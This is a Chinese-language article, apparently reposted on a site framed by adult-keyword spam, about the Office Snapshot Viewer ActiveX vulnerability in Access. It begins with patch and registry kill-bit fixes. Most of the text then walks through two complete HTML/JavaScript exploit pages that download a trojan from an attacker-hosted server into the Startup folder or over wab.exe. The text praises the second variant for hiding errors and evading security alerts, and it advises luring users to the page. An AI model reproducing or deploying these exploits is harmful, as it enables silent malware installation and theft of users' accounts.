亚洲香蕉成人av网站在线观看_欧美精品成人91久久久久久久_久久久久久久久久久亚洲_热久久视久久精品18亚洲精品_国产精自产拍久久久久久_亚洲色图国产精品_91精品国产网站_中文字幕欧美日韩精品_国产精品久久久久久亚洲调教_国产精品久久一区_性夜试看影院91社区_97在线观看视频国产_68精品久久久久久欧美_欧美精品在线观看_国产精品一区二区久久精品_欧美老女人bb

首頁 > 數據庫 > Access > 正文

堵住電腦中的Access漏洞 拒絕惡意網站

2024-09-07 19:05:12
字體:
來源:轉載
供稿:網友

  access漏洞威脅的潛在人群十分巨大。目前已經有不少利用該漏洞的惡意網站了,一旦用戶訪問這些頁面就會被植入木馬下載器,這些木馬下載器成功進入用戶系統并執行后,就會下載其他的惡意程序木馬,試圖盜取用戶的QQ、網游等賬號,危險不言而喻。

  本次Access漏洞除Office2007版本外,在以前的版本中廣泛存在。由于用戶在安裝Office的時候很多都是選擇的默認安裝,附帶也安裝了Access,所以漏洞威脅的用戶群數量非常的巨大。

  HTTP GET功能導致漏洞出現

  本次的Access漏洞的全名稱為“Microsoft Office Snapshot Viewer ActiveX Exploit 漏洞”,是一個ActiveX控件漏洞。該漏洞存在于snapview.ocx控件中,出現的原因是因為該控件具有HTTP GET功能,這個功能可以從指定的網址下載指定的文件。

  黑客要利用該漏洞,先要特制一個惡意網站引誘用戶訪問。當用戶打開該網頁的時候,惡意網址就賦給了HTTP GET功能,該功能被激活后就偷偷從惡意網址下載病毒,這樣病毒就可以神不知鬼不覺地進入用戶的系統中,威脅用戶的各種賬號和密碼。受這個漏洞影響的Access版本有2003、2002、2000。

  Access漏洞解決方案

  方案1:現在已經有了該漏洞的補丁了,請大家趕快到http://www.shudoo.com/bzsoft下載。此外,我們還可以在“工具→Internet選項→安全”中,選擇“Internet”圖標,然后將下面的安全級別中設置為“高”(圖3),這樣可以有效地阻止網頁木馬入侵。

    圖3

  方案2 :將以下內容復制在記事本中,另存為1.reg,然后雙擊導入注冊表也可以堵上漏洞。

Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Internet Explorer/ActiveX Compatibility/{F0E42D50-368C-11D0-AD81-00A0C90DC8D9}]
“Compatibility Flags”=dWord:00000400
[HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Internet Explorer/ActiveX Compatibility/{F0E42D60-368C-11D0-AD81-00A0C90DC8D9}]
“Compatibility Flags”=dword:00000400
[HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Internet Explorer/ActiveX Compatibility/{F2175210-368C-11D0-AD81-00A0C90DC8D9}]
“Compatibility Flags”=dword:00000400

  目前黑客利用Access漏洞的主要方式

  方式1:寫入啟動項

  先申請一個免費的Web空間,用Mini downloader by SEC配置網頁木馬,在“URL”處輸入網頁木馬地址,再點擊“Creat”,又再彈出窗口中將文件保存為test.exe,這樣就網頁木馬就配置好了。

  

  接著將test.exe上傳到先前申請的免費空間里面,病毒地址就是:http://(這里是申請的空間地址)/test.exe 。將以下漏洞的利用代碼復制粘貼到新建的記事本里,另存為test.html。

<html>
<object classid='clsid:F0E42D50-368C-11D0-AD81-00A0C90DC8D9′ id='obj'></object>
<script language='javascript'>
var buf1 = ‘http://(這里是申請的空間地址)/test.exe';
var buf2 = ‘C:/Documents and Settings/All Users/「開始」菜單/程序/啟動/test.exe';
obj.SnapshotPath = buf1;
obj.ComPRessedPath = buf2;
</script>
</html>
  

  最后將test.html上傳到空間里,得到病毒的訪問地址:http://(這里是空間地址)/test.html。做到這步,剩下的工作就是傳播網址引誘用戶訪問了。當用戶訪問該網頁時就會中招,用戶的電腦會在啟動項里出現test.exe文件。

  

  點評:這種方式有個缺點,就是有些安全軟件會提示有程序寫入啟動項。

  方式2:不寫入啟動項

  將以下代碼復制到新建的記事本中,另存為test.html上傳到空間即可。當用戶訪問該網頁時也會中招,不過啟動項里沒有test.exe文件,用戶無法察覺自己中毒了。

  
<html>
<body>
<script type="text/Javascript">
function killErrors() {
return true;
}
window.onerror = killErrors;
var x;
var obj;
var mycars = new Array();
mycars[0] = "C:/Program Files/Outlook Express/wab.exe";
mycars[1] = "d:/Program Files/Outlook Express/wab.exe";
var objlcx = new ActiveXObject("snpvw.Snapshot Viewer Control.1");
if(objlcx="[object]")
{
setTimeout('window.location = "[url=ldap://"]ldap://"',3000[/url]);
for (x in mycars)
{
obj = new ActiveXObject("snpvw.Snapshot Viewer Control.1")
var buf1 = 'http://(這里是申請的空間地址)/test.exe';
var buf2=mycars[x];
obj.Zoom = 0;
obj.ShowNavigationButtons = false;
obj.AllowContextMenu = false;
obj.SnapshotPath = buf1;
try
{
   obj.CompressedPath = buf2;
   obj.PrintSnapshot();
}catch(e){}
}
}
</script>
</body>
</html>
 

  點評:這種方式無需寫入啟動項,這樣安全軟件就不會有任何提示了,在用戶訪問惡意頁面的時候直接中馬,使用戶中馬的概率更高。


發表評論 共有條評論
用戶名: 密碼:
驗證碼: 匿名發表
亚洲香蕉成人av网站在线观看_欧美精品成人91久久久久久久_久久久久久久久久久亚洲_热久久视久久精品18亚洲精品_国产精自产拍久久久久久_亚洲色图国产精品_91精品国产网站_中文字幕欧美日韩精品_国产精品久久久久久亚洲调教_国产精品久久一区_性夜试看影院91社区_97在线观看视频国产_68精品久久久久久欧美_欧美精品在线观看_国产精品一区二区久久精品_欧美老女人bb
精品人伦一区二区三区蜜桃网站| 亚洲国产日韩精品在线| 亚洲欧美一区二区三区在线| 96pao国产成视频永久免费| 色婷婷久久av| 日韩av理论片| 精品一区二区三区四区在线| 欧美日韩激情网| 国产日韩精品视频| 国产成人97精品免费看片| 日韩电影免费观看在线| 日韩av电影国产| 91精品国产91久久久| 久久久久在线观看| 中文字幕亚洲综合久久筱田步美| 欧美激情一区二区三区久久久| 国产精品狼人色视频一区| 国产一区二区三区在线| 亚洲奶大毛多的老太婆| 亚洲第一免费网站| 亚洲精品视频免费| 日韩中文在线视频| 国产日韩亚洲欧美| 亚洲韩国青草视频| 日韩一二三在线视频播| 国精产品一区一区三区有限在线| 亚洲欧美日韩一区二区三区在线| 欧美成人精品影院| 亚洲少妇中文在线| 欧美视频在线观看免费网址| 亚洲图片在线综合| 欧美日韩国产91| 亚洲丁香婷深爱综合| xxxxxxxxx欧美| 日韩av影片在线观看| 国内精品久久久久久久久| 久热精品视频在线观看一区| 日韩成人免费视频| 日韩美女写真福利在线观看| 91在线高清免费观看| 亚洲欧美制服综合另类| 亚洲第一免费网站| 日韩性xxxx爱| 91免费电影网站| 91精品国产综合久久久久久蜜臀| 国产精品欧美日韩久久| 成人亚洲激情网| 欧美日韩国产精品一区二区不卡中文| 亚洲自拍偷拍区| 国产精品视频99| 亚洲aa在线观看| 亚洲japanese制服美女| 国产一区二区欧美日韩| 亚洲天堂男人天堂女人天堂| 最新中文字幕亚洲| 中文综合在线观看| 自拍偷拍亚洲欧美| 亚洲精品av在线| 91亚洲永久免费精品| 亚洲另类图片色| 久久久亚洲国产天美传媒修理工| 国产精品电影久久久久电影网| 欧美国产日韩一区二区| 国产精品亚洲片夜色在线| 国产精品www色诱视频| 中文字幕在线观看日韩| 丝袜情趣国产精品| 2023亚洲男人天堂| 色噜噜狠狠狠综合曰曰曰| 成人免费淫片视频软件| 日韩在线资源网| 欧美精品videofree1080p| 国产精品久久久久久搜索| 97精品视频在线| 97视频人免费观看| 亚洲深夜福利在线| 一区二区三区黄色| 日韩电影中文字幕一区| 日韩在线视频中文字幕| 国产精品久久久久久网站| 欧美精品九九久久| 成人免费在线网址| 精品高清美女精品国产区| 欧美日韩免费观看中文| 日韩在线播放av| 亚洲欧美综合区自拍另类| 深夜福利一区二区| 亚洲色图国产精品| 激情久久av一区av二区av三区| 国产免费一区二区三区在线观看| 久久中文精品视频| 日韩电影免费在线观看中文字幕| 欧美精品一区二区免费| 亚洲天堂成人在线视频| 国产成人免费av电影| xxxx性欧美| 中文字幕在线看视频国产欧美在线看完整| 亚洲一区二区三区乱码aⅴ| 欧美美最猛性xxxxxx| 欧美日韩综合视频| 久久久久久久国产精品视频| 伊人久久久久久久久久久| 亲子乱一区二区三区电影| 8090理伦午夜在线电影| 国产欧美日韩丝袜精品一区| 久久露脸国产精品| 国产激情久久久久| 日本亚洲欧美三级| 中文字幕9999| 久久久久久久久久婷婷| 亚洲福利在线视频| 日韩欧美一区二区在线| 国内精品小视频在线观看| 久久亚洲精品中文字幕冲田杏梨| 国产婷婷色综合av蜜臀av| 日韩av网址在线观看| 欧美精品成人91久久久久久久| 在线电影欧美日韩一区二区私密| 久久精品视频在线| 精品无人国产偷自产在线| 久久久久久久久91| 日本中文字幕不卡免费| 中文字幕成人在线| 国产欧美精品一区二区三区介绍| 欧美猛交ⅹxxx乱大交视频| 亚洲男人天堂2024| 久久成人人人人精品欧| 欧美成人精品三级在线观看| 成人写真视频福利网| 精品色蜜蜜精品视频在线观看| 欧美激情免费观看| 成人在线观看视频网站| 日韩欧美第一页| 精品久久中文字幕久久av| 日韩精品在线观看视频| 亲子乱一区二区三区电影| 国产精品视频不卡| 日本一区二区在线免费播放| 国产欧美精品在线| 欧美成人免费在线观看| 九九九久久久久久| 日韩成人在线网站| 亚洲欧美三级在线| 日韩精品久久久久久福利| 国产999精品视频| 日本欧美精品在线| 久久久亚洲影院你懂的| 精品国产成人在线| 欧美日本在线视频中文字字幕| 国产精品video| 7m第一福利500精品视频| 日韩激情视频在线播放| 国产精品美女999| 91精品国产自产在线老师啪| 成人性生交xxxxx网站| 欧美高跟鞋交xxxxxhd| 欧美午夜视频在线观看| 97在线视频观看| 欧美国产亚洲精品久久久8v| 97精品在线观看| 中文字幕亚洲综合久久筱田步美| 国产精品91久久久久久| 亚洲午夜未删减在线观看| 7777免费精品视频|